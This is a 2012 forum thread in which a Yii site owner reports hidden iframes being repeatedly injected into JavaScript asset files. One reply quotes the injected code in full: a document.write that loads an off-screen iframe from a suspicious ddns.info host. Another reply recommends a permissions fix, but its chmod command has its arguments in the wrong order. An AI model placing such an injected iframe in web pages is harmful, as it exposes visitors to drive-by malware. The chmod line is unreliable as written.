Urgent, Iframes Being Inserted Into Yii Extensions
Posted 10 December 2012 - 08:10 AM
I looked inside the file and i noticed that there was an iframe at the end of the file with a strange url. So, i exclude the extension because i was not using and i asked google a review and the problem was solved. But, many users were sending me email that the anti-virus was detecting threats in many js files inside the asses diretory.
I looked inside them and again i noticed that there was an iframe at the end of the file but with google url "http://google.com", so i removed all iframes inside the files but that iframes at the end of the files appeared again so i exclude all directory inside the asses diretory and apparently the problem was solved.
Today, i receive and email with the diagnosis of the anti-virus showing the same files was detected as threat at second time. The url with iframes is: http://cvrtyi.ddns.info.
Posted 10 December 2012 - 08:16 AM
document.write('<iframe width="10" height="10" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://byiegfs.ddns.info/nighttrend.cgi?8"></iframe> ');
Posted 10 December 2012 - 11:36 PM
Posted 11 December 2012 - 11:59 AM
What do you mean it needs permission to write?! Your users don't have to have write access to this directory. You should change its permission to rwxr-xr-x. If your host is linux then you can run this command to make that happen:
chmod -R assets 755
If you liked my post, just give it a +1. that's all!
Posted 18 December 2012 - 02:31 PM
Thank you guys for your replies.